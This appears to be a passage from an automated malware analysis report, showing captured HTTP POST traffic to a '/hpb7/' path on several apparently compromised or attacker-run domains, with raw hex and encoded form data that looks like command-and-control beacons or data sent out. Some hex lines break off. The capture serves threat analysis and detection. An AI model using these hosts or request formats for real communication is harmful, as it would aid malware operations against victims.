4d 78 33 66 69 7e 6b 53 5f 39 45 42 45 47 48 33 69 57 37 55 6b 74 51 73 78 35 57 45 51 55 44 54 65 36 5f 56 44 41 58 5a 39 79 38 36 69 67 64 52 4b 77 6d 70 72 48 6e 66 64 49 57 43 6a 42 39 31 79 59 43 77 5f 56 3
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.kunimi.orgConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.kunimi.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kunimi.org/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 47 75 61 75 64 39 45 4f 77 48 76 76 68 62 77 68 55 70 32 5f 62 59 48 39 4f 65 73 6d 4f 5a 6c 61 76 33 55 61 6d 59 76 44 30 34 4c 4d 49 46 6d 4b 37 6a 61 33 72 71 57 59 66 61 6f 53 34 41 7a 58 48 5a 6c 72 54 63 71 45 75 65 68 32 70 50 69 6a 67 35 4e 71 62 74 42 72 79 38 78 4a 38 52 71 56 4a 7a 7a 39 58 33 43 2d 69 69 33 4f 56 4f 4d 48 6a 67 4d 72 61 51 59 64 79 70 39 4d 28 43 33 37 52 2d 42 49 50 47 33 5a 4d 5a 73 6b 6f 73 6b 4f 5a 63 71 39 38 58 43 52 6c 6d 31 4f 38 4f 4a 49 76 6a 43 6f 30 4e 37 50 7a 5a 31 49 39 6a 4f 44 63 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=Guaud9EOwHvvhbwhUp2_bYH9OesmOZlav3UamYvD04LMIFmK7ja3rqWYfaoS4AzXHZlrTcqEueh2pPijg5NqbtBry8xJ8RqVJzz9X3C-ii3OVOMHjgMraQYdyp9M(C37R-BIPG3ZMZskoskOZcq98XCRlm1O8OJIvjCo0N7PzZ1I9jODcQ).
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.kunimi.orgConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.kunimi.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kunimi.org/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 47 75 61 75 64 39 45 4f 77 48 76 76 67 37 41 68 48 61 65 5f 64 34 48 38 45 2d 73 6d 41 4a 6c 57 76 33 49 61 6d 5a 37 74 30 4f 54 4d 49 32 75 4b 36 42 43 33 70 71 57 59 58 36 70 61 6c 77 7a 42 48 5a 68 42 54 59 6a 78 75 63 4e 32 6f 62 4b 6a 6e 5a 4e 70 54 74 42 71 31 38 78 4b 68 42 71 56 4a 7a 7e 73 58 79 33 44 69 6a 50 4f 55 35 4d 48 6a 6c 51 73 61 41 59 65 76 35 39 4d 28 44 4c 6b 52 2d 41 7a 50 47 65 45 4d 59 4d 6b 70 39 55 4f 66 4a 65 38 28 48 43 4c 35 32 30 59 77 64 6f 6e 6b 79 44 61 32 4f 50 32 31 74 59 58 34 7a 28 6f 4b 56 6d 74 64 35 59 59 65 58 43 6d 49 6d 4a 48 4c 30 68 6f 74 6d 52 78 75 6e 77 4b 32 6d 39 7a 4c 48 70 78 50 6b 35 47 5a 6b 69 4c 68 68 62 54 70 7a 58 54 39 55 62 59 43 39 4b 4c 70 62 64 75 76 56 57 4b 56 63 70 45 41 33 32 4e 58 63 4d 66 54 6c 45 57 38 62 64 69 34 61 70 5f 37 39 41 76 41 34 47 30 6f 53 62 6d 65 4a 42 32 4a 6a 70 65 44 4c 53 73 68 6f 73 79 6f 30 58 4f 56 41 38 6e 32 35 54 35 56 6f 32 37 74 69 61 4d 77 70 33 62 51 44 6d 4d 41 47 68 41 48 41 41 6f 71 6f 7e 4a 44 6e 37 52 6b 74 77 34 76 43 38 58 62 42 6f 4e 41 57 62 68 49 50 46 41 4b 6c 7e 65 53 38 44 41 47 32 71 58 73 4f 31 30 7e 43 4e 63 67 66 4f 74 58 6b 62 34 45 5a 72 4e 68 61 78 70 6d 47 77 50 59 38 58 4b 7e 6c 4e 7a 51 58 67 75 78 48 77 7a 65 6f 38 2d 43 4d 74 51 67 56 71 6b 4d 58 6d 49 43 57 63 72 61 43 6e 31 53 6f 71 65 6a 52 70 50 4d 58 47 4c 6f 30 54 32 51 63 43 6e 69 48 4d 66 59 4e 30 78 42 78 4b 35 73 30 31 2d 64 5a 4b 6e 58 78 43 4e 48 5a 51 77 6c 48 6c 6d 57 44 4d 57 31 77 37 4f 72 35 4a 53 37 62 45 7a 55 6c 69 77 53 6f 6a 38 63 62 4f 45 64 65 78 74 32 32 46 34 68 54 77 62 41 48 41 4d 6a 76 74 7a 57 63 68 54 4c 49 28 41 47 71 73 34 55 59 47 74 43 70 7e 75 33 4a 28 44 38 4d 38 6a 68 49 48 75 59 6c 7a 41 76 6b 65 4a 47 52 47 49 28 6a 69 43 76 47 46 6f 42 32 46 38 67 34 43 5a 65 4a 48 61 56 34 75 49 59 4f 36 55 5a 47 52 6c 45 47 47 79 7a 72 67 63 4c 4d 59 4e 54 6d 41 37 51 30 63 4c 47 7a 4e 65 6a 34 45 4a 47 36 4d 44 65 4d 6c 2d 58 73 43 76 4c 32 57 70 4b 34 4f 77 48 5f 57 5a 69 6a 62 76 4f 48 38 47 59 45 67 41 6e 62 4c 54 39 6f 4e 6b 79 4b 71 47 4a 6e 39 62 7a 46 4b 6a 38 37 6f 50 30 51 38 4b 79 6b 6d 4c 49 4e 6f 54 51 64 65 57 69 42 56 33 6a 44 38 5a 57 50 66 57 71 46 51 64 54 38 34 77 46 4a 74 55 53 6c 4d 37 34 77 44 6d 43 45 4d 72 79 43 52 61 56 69 66 50 7a 4a 45 59 44 36 51 34 48 67 42 4f 45 45 64 4a 6b 75 56 36 41 43 4f 69 6c 63 39 36 50 4a 56 43 37 7a 6c 42 5a 6d 28 62 45 59 6d 69 38 79 32 6d 67 67 38 2d 53 32 4b 4e 30 65 32 35 71 41 28 6b 44 4d 32 55 67 32 6d 4e 53 49 56 4f 41 6e 57 5f 66 71 67 57 4a 54 6e 4d 32 6a 38 63 77 31 55 72 78 3
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.traindic.topConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.traindic.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.traindic.top/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 57 52 46 6c 68 77 33 4b 41 67 62 35 79 6f 39 32 4c 58 32 55 49 66 4d 47 50 4f 4b 31 66 4a 62 56 28 69 74 4d 28 38 56 68 59 34 6e 36 6c 32 30 54 41 4c 44 50 71 72 56 5f 71 4c 69 59 79 4d 34 70 4c 50 77 6a 68 58 6d 62 4a 54 5a 6e 30 33 33 53 7e 68 48 53 44 75 71 73 4b 48 77 41 51 79 6d 33 68 44 59 6b 5a 63 77 6b 61 61 6c 4e 73 61 66 51 51 66 4e 36 46 73 6c 68 46 6e 76 78 36 30 6d 5f 53 66 75 2d 77 43 4d 67 56 46 66 75 61 59 72 78 64 6b 71 55 38 67 56 70 78 6f 75 4d 30 38 6f 4e 77 67 72 74 72 5f 31 49 32 4b 57 35 47 72 6d 6e 47 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=WRFlhw3KAgb5yo92LX2UIfMGPOK1fJbV(itM(8VhY4n6l20TALDPqrV_qLiYyM4pLPwjhXmbJTZn033S~hHSDuqsKHwAQym3hDYkZcwkaalNsafQQfN6FslhFnvx60m_Sfu-wCMgVFfuaYrxdkqU8gVpxouM08oNwgrtr_1I2KW5GrmnGg).
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.traindic.topConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.traindic.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.traindic.top/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 57 52 46 6c 68 77 33 4b 41 67 62 35 77 49 4e 32 4a 77 69 55 5a 5f 4d 46 54 65 4b 31 47 5a 62 52 28 6a 52 4d 28 2d 35 4c 66 4f 28 36 6b 6e 6b 54 41 74 76 50 6f 72 56 5f 36 37 69 63 32 4d 34 42 4c 4c 5a 51 68 57 57 74 4a 56 4a 6e 33 42 7a 53 75 52 48 54 65 65 71 70 4e 48 77 48 55 79 6d 33 68 44 46 4c 5a 64 77 53 61 62 64 4e 74 6f 58 51 51 64 6c 35 45 38 6b 47 4d 48 76 78 36 30 71 38 53 66 76 47 77 47 59 77 56 46 28 75 56 70 62 78 52 51 47 58 73 41 56 51 7e 34 76 4f 37 4a 42 6d 39 67 48 68 6a 4d 56 53 7a 61 6e 71 4c 72 6d 70 64 6e 5a 4f 78 4c 55 61 56 2d 6b 51 75 48 64 44 70 67 7e 43 6f 73 66 42 59 36 67 72 63 35 4d 5a 6d 63 4d 4c 77 77 43 6e 74 4a 75 51 7e 31 51 4e 6c 6d 61 46 78 38 6c 6e 54 72 54 72 4d 63 35 56 55 48 37 44 4e 6a 42 6b 59 31 58 5f 36 7a 62 46 6d 47 73 57 56 6a 75 62 74 7a 57 6d 6b 46 32 76 31 35 63 41 6c 76 78 70 55 57 78 75 4c 55 7a 61 4e 7a 79 45 4c 33 6b 49 74 6a 42 2d 5a 6c 43 52 47 2d 6b 77 39 6e 79 67 42 6b 71 4e 6e 63 4e 30 31 46 66 78 7e 59 70 74 4e 34 43 6e 32 58 74 66 6e 5f 28 34 36 37 67 32 50 63 6d 49 56 6b 6e 52 56 7a 4c 41 73 76 54 52 75 59 6e 72 66 76 55 57 53 45 35 30 77 63 5a 4e 39 6c 38 63 6d 5f 62 46 53 53 54 5a 71 66 70 51 36 70 6d 35 37 57 58 32 71 43 44 46 64 4c 6f 4c 4a 68 77 4b 71 66 6e 77 73 30 71 47 73 45 63 78 30 72 53 78 34 75 6f 75 74 31 58 46 28 31 52 4e 53 41 34 36 79 4c 31 58 33 64 6b 4d 7e 56 32 31 52 50 73 52 46 65 61 66 68 34 7e 6f 50 6b 4e 44 7a 5f 45 74 32 68 36 65 4e 52 39 73 6e 45 36 4a 28 35 6b 4f 59 58 6a 48 79 44 77 73 51 6b 35 32 53 2d 65 46 50 4d 30 49 61 39 67 72 46 6c 63 67 71 6e 4a 6a 51 4c 6e 4e 70 7a 64 71 50 46 56 6a 62 6a 65 36 76 7a 48 38 37 5a 39 6b 28 63 49 52 44 51 64 49 5a 34 50 4e 44 4f 65 6b 74 69 56 6f 31 36 78 66 39 65 65 35 72 76 6f 62 52 68 66 4b 69 39 59 35 39 52 76 72 30 39 41 57 4f 42 51 38 70 65 66 7a 4e 42 55 45 56 78 44 62 33 4e 52 30 52 32 58 73 7e 4b 42 4f 57 63 50 66 6f 7a 77 48 58 51 6f 72 45 32 33 79 75 78 28 38 43 4d 48 5a 65 4b 39 74 74 68 51 75 79 74 33 56 61 36 67 61 66 59 33 6f 65 61 4b 78 33 77 39 55 5a 4e 79 4e 36 35 6e 61 71 43 43 68 62 64 70 6a 37 32 54 48 64 31 75 54 78 53 6c 4b 69 56 4e 32 58 66 66 76 78 52 76 33 6a 45 77 31 6f 4c 63 5a 34 75 37 6a 46 76 32 71 4d 73 43 4b 6f 6a 33 70 48 73 73 77 74 44 6d 64 52 62 4a 6f 4f 5f 74 62 6f 75 71 43 69 5a 33 58 37 37 31 74 35 67 4b 48 63 61 28 64 48 68 4a 51 6e 7a 74 78 44 57 56 34 41 6b 4f 6c 75 4a 6f 32 7a 56 4a 67 73 54 38 36 6e 6d 33 74 65 78 7a 6b 7a 6f 52 4d 6f 6c 39 53 79 79 4c 36 6c 77 46 61 59 34 52 4f 4b 30 48 45 43 64 4c 73 62 46 70 65 37 4a 77 66 7a 53 4d 69 55 36 4e 41 4a 50 7e 4
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.bohndigitaltech.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.bohndigitaltech.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bohndigitaltech.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 7a 53 73 47 64 67 61 39 61 6c 39 6c 52 4d 7e 6c 75 5a 74 42 55 30 74 5a 45 4d 79 6d 4b 4f 30 68 77 51 53 57 31 66 6e 63 56 41 72 65 61 2d 32 78 6e 39 28 66 37 4e 59 68 6e 47 37 45 4c 4a 6a 42 65 53 72 39 41 33 6a 4d 51 54 7a 53 5a 59 4b 4b 6f 56 73 69 32 79 57 54 4c 45 59 72 66 67 64 70 62 63 48 50 79 44 72 4c 61 43 73 30 64 6b 28 51 4a 6c 47 55 28 34 49 64 5a 37 67 30 76 66 6e 76 67 59 5a 44 33 39 51 35 43 46 6b 50 44 79 31 6f 50 57 39 37 4d 5f 38 73 34 4c 33 37 4c 53 50 43 62 67 59 38 55 71 66 5a 46 33 5a 32 67 56 30 71 61 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=zSsGdga9al9lRM~luZtBU0tZEMymKO0hwQSW1fncVArea-2xn9(f7NYhnG7ELJjBeSr9A3jMQTzSZYKKoVsi2yWTLEYrfgdpbcHPyDrLaCs0dk(QJlGU(4IdZ7g0vfnvgYZD39Q5CFkPDy1oPW97M_8s4L37LSPCbgY8UqfZF3Z2gV0qaA).
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.bohndigitaltech.comConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.bohndigitaltech.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bohndigitaltech.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 7a 53 73 47 64 67 61 39 61 6c 39 6c 44 5f 57 6c 6a 61 46 42 63 30 74 61 4c 73 79 6d 45 65 30 62 77 51 65 57 31 65 6a 4d 56 53 48 65 66 39 4f 78 6e 66 58 66 35 4e 59 68 76 6d 37 41 47 70 6a 74 65 53 76 78 41 79 66 63 51 57 4c 53 5a 4b 43 4b 34 46 73 68 36 79 57 57 4d 45 59 6f 43 51 64 70 62 63 4c 54 79 43 72 39 61 43 6b 30 64 33 6e 51 4a 6e 7e 58 35 6f 49 63 42 4c 67 30 76 66 62 67 67 59 5a 31 33 2d 68 2d 43 45 45 50 43 67 74 6f 44 6e 39 34 43 5f 38 76 37 4c 32 4f 49 42 57 64 5a 69 49 67 47 71 33 6c 45 7a 78 34 6b 46 59 6d 4e 75 54 47 4e 76 74 4d 43 45 44 52 35 44 47 49 52 4c 4f 52 41 33 4f 75 57 78 6b 5f 57 6d 39 58 6b 59 62 50 49 42 4d 41 45 6f 4a 30 75 54 69 49 6e 6b 37 58 36 4e 48 59 42 4c 4a 56 51 6e 32 35 6c 78 55 79 28 72 51 42 6b 44 6b 69 51 49 52 67 75 58 71 59 76 74 4c 36 6a 69 74 75 31 30 55 58 78 6d 35 46 51 47 77 47 62 61 42 59 34 58 6d 73 67 42 47 63 50 44 69 4a 35 55 52 4a 64 34 73 49 6d 78 65 4a 43 53 68 2d 7e 58 76 59 39 78 56 45 41 74 6a 54 55 73 36 31 28 5f 4b 6e 78 37 76 30 64 4b 78 75 35 57 43 42 61 6d 6b 5a 50 62 41 2d 75 65 68 71 71 54 57 59 51 77 61 67 4c 6c 73 49 63 43 64 31 52 74 77 64 72 69 47 46 4c 37 43 77 34 31 64 45 4e 31 6e 44 59 53 74 6a 44 71 37 50 6e 74 4c 78 73 4c 5a 30 39 76 4c 6f 69 69 4d 71 56 56 44 35 58 75 38 4a 43 6f 43 53 32 47 74 57 38 35 59 59 35 30 43 78 56 6d 75 6f 37 71 68 78 74 47 47 4c 4c 39 53 6d 65 65 6c 32 4d 4b 6d 34 6c 74 49 48 65 4b 55 4a 62 53 68 59 4c 66 37 41 44 45 54 4c 70 45 35 5f 77 35 51 35 28 4a 47 44 50 46 4f 45 56 49 4e 54 79 54 4f 30 52 2d 38 4a 77 69 6f 6a 42 30 71 43 55 38 36 46 4a 5f 72 62 4f 7a 6d 65 79 66 47 79 6d 69 6c 52 61 6d 6b 6a 4a 34 52 47 74 69 74 4c 63 47 6b 4f 36 38 39 43 78 48 62 54 64 42 4b 4e 65 62 4b 47 75 30 72 6b 6c 57 78 69 77 6a 4f 36 31 5f 35 38 64 42 52 2d 4f 5a 41 39 33 4e 78 4e 58 39 46 6d 6a 57 77 39 4f 51 4a 78 58 65 63 73 71 6f 59 76 4c 6f 79 49 43 4f 28 6d 30 4e 47 63 4b 38 69 44 28 39 42 76 7e 57 62 43 6f 52 6e 53 34 47 44 44 78 56 6d 6b 4c 51 59 68 4f 5f 50 32 42 68 31 4b 7a 43 72 76 4b 65 52 32 4b 33 38 38 75 32 66 6f 4b 7a 38 74 6c 78 36 4d 38 76 44 6e 66 72 48 67 4b 69 65 31 48 4e 4d 7a 70 61 66 6b 49 72 4d 58 54 4f 35 52 33 48 62 6f 32 73 59 45 45 39 32 6c 74 54 7e 37 53 4a 6b 35 45 71 58 56 61 78 7e 47 7e 66 41 64 74 37 6d 33 39 42 6a 30 6f 78 54 69 47 61 72 6b 68 57 42 7a 66 6b 7e 4d 6b 4b 4b 4c 6b 45 35 62 42 7a 75 36 39 6c 34 47 58 47 73 69 67 77 68 56 32 64 42 4c 56 39 55 5a 79 37 56 5f 41 6c 48 6e 62 67 56 58 66 5f 35 38 53 6d 45 64 36 58 42 30 7a 65 6f 63 79 78 54 67 50 69 73 72 56 4b 64 51 28 64 35 45 5
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.rifleroofers.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.rifleroofers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rifleroofers.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 66 70 64 67 67 6a 52 74 31 72 4b 6e 69 76 6b 49 41 2d 33 38 77 78 69 30 63 45 6e 79 76 46 52 4e 34 4c 4e 78 4e 31 70 6c 34 48 4c 5a 62 32 6f 33 73 6f 4f 43 4b 62 66 65 4b 59 38 35 68 6a 4f 70 5a 47 45 5a 66 4a 49 58 44 34 36 44 34 4f 47 59 4f 54 7e 52 72 45 31 6e 73 53 68 48 38 32 75 42 72 6d 58 4c 34 64 48 49 30 42 39 56 61 64 72 77 4f 54 6c 57 52 46 62 65 79 34 63 64 61 69 30 6b 54 4b 6c 44 63 54 4f 6f 42 5f 66 4b 44 67 6c 45 28 38 6f 65 37 4b 64 52 7e 73 79 71 42 78 52 65 72 47 6d 62 63 64 70 36 66 71 62 58 39 54 49 4c 75 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=fpdggjRt1rKnivkIA-38wxi0cEnyvFRN4LNxN1pl4HLZb2o3soOCKbfeKY85hjOpZGEZfJIXD46D4OGYOT~RrE1nsShH82uBrmXL4dHI0B9VadrwOTlWRFbey4cdai0kTKlDcTOoB_fKDglE(8oe7KdR~syqBxRerGmbcdp6fqbX9TILuA).
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.rifleroofers.comConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.rifleroofers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rifleroofers.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 66 70 64 67 67 6a 52 74 31 72 4b 6e 77 66 55 49 54 4a 72 38 6e 42 69 33 43 30 6e 79 34 56 51 4b 34 4c 42 78 4e 30 64 31 37 31 6e 5a 62 68 73 33 6f 37 6d 43 49 62 66 65 4d 59 39 2d 75 44 4f 5f 5a 47 52 6f 66 4d 30 48 44 2d 4b 44 7e 63 7e 59 4b 7a 7e 57 33 55 31 6d 67 79 68 45 7a 57 75 42 72 6d 4b 6f 34 63 47 5f 30 46 78 56 61 6f 28 77 4f 52 4e 56 51 56 62 66 74 6f 63 64 61 69 34 68 54 4b 6c 54 63 54 47 34 42 37 54 4b 43 79 52 45 73 4a 55 64 72 71 64 53 7a 4d 7a 44 4e 43 38 58 68 33 75 6a 62 50 35 42 64 75 36 36 30 33 42 67 34 6a 28 41 6f 64 58 78 44 49 5a 6e 47 62 6d 4c 6b 37 32 44 7a 49 49 6d 4d 36 41 65 74 70 6e 75 79 4c 54 79 46 50 73 39 63 36 4f 47 4c 56 34 61 31 39 43 31 5a 43 72 69 6e 31 78 61 62 42 67 6a 79 45 79 47 75 44 74 75 4f 53 36 66 4e 47 51 39 65 76 4d 49 49 49 35 67 64 54 61 43 38 62 35 31 70 77 67 2d 4d 74 48 71 62 62 6b 36 6c 6c 75 63 31 32 4f 4d 34 49 31 4b 76 48 57 2d 77 4c 63 31 57 57 38 46 78 38 6e 54 51 31 68 6e 28 46 47 41 39 67 79 45 46 69 67 4e 42 5f 39 31 62 62 35 47 64 7a 66 36 70 42 46 68 59 37 6c 50 6d 33 61 64 54 50 48 69 31 64 6a 33 57 6e 48 71 36 44 76 68 66 30 58 34 76 57 64 30 76 6a 30 71 69 44 73 51 54 37 62 2d 6a 57 34 5a 7e 45 43 2d 30 56 73 45 55 6c 36 43 4a 6e 33 6c 68 70 54 6f 78 59 4b 6d 55 52 39 45 58 4e 34 4f 63 51 51 56 7a 55 7e 41 61 66 43 57 4d 68 66 62 7a 4c 6c 7a 32 47 51 43 6b 63 4f 34 4e 77 5a 42 4e 52 31 5f 75 45 4a 35 79 62 36 56 41 39 47 57 4a 54 52 4a 73 59 61 38 74 36 37 35 67 51 45 61 79 59 69 35 73 6b 31 79 5a 41 31 7a 67 54 74 71 58 74 6c 68 59 53 79 7a 57 54 36 76 53 47 64 46 56 4d 66 4b 55 4d 6a 47 65 75 47 44 6a 76 6f 37 54 35 78 6a 57 6b 62 59 44 75 52 75 50 31 39 43 67 62 4c 48 45 52 31 44 75 69 28 7a 28 44 48 6f 77 4b 6e 35 28 46 30 59 64 6b 34 56 31 68 5a 52 6b 69 56 52 4b 45 4b 30 49 75 71 5a 48 53 62 68 4e 38 4b 41 45 59 6e 55 62 44 6a 41 4f 38 4d 67 32 58 5a 35 6a 77 61 57 52 38 4f 64 58 65 57 4e 48 55 36 71 7e 4f 76 6c 50 55 51 42 43 77 78 34 4c 4a 6a 4c 4b 31 48 43 6f 35 42 52 42 78 76 77 50 47 77 70 4a 65 43 49 71 45 33 74 71 4a 4b 62 44 44 43 6e 57 49 66 45 42 38 58 35 48 70 65 63 67 72 4c 75 4c 30 54 4f 37 4a 44 43 32 6d 31 69 51 4d 6a 7a 4a 73 45 77 71 4c 46 70 68 74 5a 41 59 2d 53 6d 52 2d 7a 54 58 32 6c 70 45 5a 68 58 45 43 69 4a 4b 45 44 57 62 4d 5a 33 41 50 4c 41 7e 61 33 74 37 70 5a 44 6e 69 51 4a 66 46 57 33 6a 57 59 33 45 77 31 34 75 70 45 51 66 32 4d 5a 71 71 73 2d 47 36 57 43 6e 32 65 6a 36 37 37 2d 55 70 50 63 49 74 63 79 62 32 38 47 5a 63 70 44 4d 6b 69 35 56 53 36 34 70 5f 32 47 44 69 4a 39 79 66 70 74 63 6c 7e 6e 7a 44 55 6a 73 6b 44 4
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.denko-kosan.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.denko-kosan.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.denko-kosan.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 41 73 76 67 65 4c 44 66 70 64 4b 5a 28 6d 4b 38 51 6b 52 4c 77 5f 6d 75 78 44 30 48 70 49 69 73 48 30 72 70 72 66 41 54 6b 6d 6c 6e 42 4b 68 67 79 37 65 6e 75 78 58 59 79 35 45 30 45 70 7e 58 51 6d 72 72 5a 4d 55 6e 75 76 37 33 51 69 6b 57 37 36 4c 46 59 74 71 34 32 6e 59 43 63 70 69 6c 54 39 6d 62 4e 32 54 39 4e 65 66 32 7a 68 6d 72 36 7a 4d 33 68 53 34 62 58 4c 76 6b 71 39 6d 6a 6a 67 54 33 70 45 47 69 44 34 6b 2d 51 2d 53 77 76 78 73 78 28 71 63 36 6d 42 42 61 36 51 6a 46 62 4d 68 54 47 69 4b 4e 51 5a 47 2d 5a 50 31 53 39 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=AsvgeLDfpdKZ(mK8QkRLw_muxD0HpIisH0rprfATkmlnBKhgy7enuxXYy5E0Ep~XQmrrZMUnuv73QikW76LFYtq42nYCcpilT9mbN2T9Nef2zhmr6zM3hS4bXLvkq9mjjgT3pEGiD4k-Q-Swvxsx(qc6mBBa6QjFbMhTGiKNQZG-ZP1S9g).
          Source: global trafficHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.denko-kosan.comConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.denko-kosan.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.denko-kosan.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 41 73 76 67 65 4c 44 66 70 64 4b 5a 77 6d 61 38 57 44 39 4c 6e 50 6d 74 39 6a 30 48 67 6f 69 67 48 30 6e 70 72 62 59 44 6b 55 70 6e 50 38 78 67 79 5a 6d 6e 7e 42 58 59 6a 70 45 77 4b 4a 28 55 51 6d 28 5a 5a 4a 70 53 75 74 58 33 52 77 73 57 35 61 4c 45 48 64 71 35 78 6e 59 46 53 4a 69 6c 54 39 72 36 4e 79 47 41 4e 66 33 32 79 54 75 72 36 32 34 30 68 43 34 61 50 37 76 6b 71 39 71 77 6a 67 54 42 70 45 50 6e 44 34 45 2d 52 73 4b 77 74 67 73 79 70 4b 63 39 6c 42 41 51 38 41 4b 62 50 63 6f 6b 54 69 4b 7a 65 65 37 76 50 72 67 49 6f 36 75 44 56 74 4a 58 76 71 73 47 48 6a 45 5a 72 57 76 58 38 74 74 79 31 7a 34 4a 31 6d 4d 31 57 59 42 50 5a 38 69 6f 45 62 35 45 58 4f 4f 6c 6e 38 7e 4b 6a 6c 4c 4f 78 37 39 30 53 69 35 30 70 78 4e 37 43 6a 33 43 49 6c 39 31 34 69 56 6b 4d 45 4d 69 62 4e 28 54 30 35 52 63 30 55 49 58 46 57 34 46 56 33 41 48 61 45 66 56 47 4a 66 53 37 32 73 6f 42 6f 68 50 72 53 56 33 48 73 56 34 7a 58 49 36 79 54 56 46 49 5f 49 4e 4b 6e 48 4c 31 33 75 4f 61 37 30 49 41 38 74 4e 4c 6f 77 36 4c 71 6b 49 31 35 6f 5f 73 32 55 4f 28 5a 41 74 46 34 52 45 54 44 42 76 28 31 52 30 75 6f 7e 4c 7e 4a 47 6f 7e 73 48 7a 76 42 44 71 75 6d 78 61 54 76 54 6d 30 4d 6c 33 57 54 4e 4f 71 79 42 5f 47 32 73 68 6a 66 4b 48 78 73 76 71 30 6b 51 75 45 6c 7a 78 43 37 43 6d 4e 55 46 73 6f 72 54 2d 58 51 4c 64 67 32 73 37 49 33 6a 50 62 79 54 5f 50 66 58 65 71 44 72 49 67 4e 37 37 78 33 28 61 6e 70 38 69 30 67 49 71 68 49 6f 39 49 49 39 4a 4a 68 63 35 28 56 28 62 33 6f 65 65 76 41 4e 65 66 70 32 62 67 62 6a 6f 34 31 67 6a 44 53 6f 71 30 59 50 4b 31 6f 75 46 6e 57 4c 49 42 52 48 61 69 31 46 61 4b 66 4a 46 6f 63 6c 6e 67 6b 45 43 34 59 66 32 65 33 69 75 75 5f 47 2d 4f 55 57 62 55 55 71 56 30 61 63 34 6e 31 41 4d 43 64 35 6c 53 70 6f 33 41 49 76 65 76 33 39 73 4c 45 4f 71 28 5f 32 71 69 42 53 69 56 30 63 6a 36 34 4a 6f 79 43 64 57 67 71 76 5a 49 6e 76 52 73 36 4f 2d 76 77 47 57 7a 5a 72 6b 66 61 39 48 5a 64 35 79 75 6c 4f 6f 48 4e 43 50 79 72 77 56 78 43 4d 72 79 46 6a 41 63 4b 51 50 7e 47 54 36 48 56 62 76 65 7a 4a 30 6d 66 57 42 4a 4b 43 4d 56 4d 59 52 6a 62 37 77 34 72 51 68 68 5f 52 56 28 6a 34 34 58 41 76 72 6e 43 50 6d 59 53 59 61 66 31 30 52 77 70 52 6a 33 68 28 46 47 57 45 53 75 63 33 65 6c 51 54 38 79 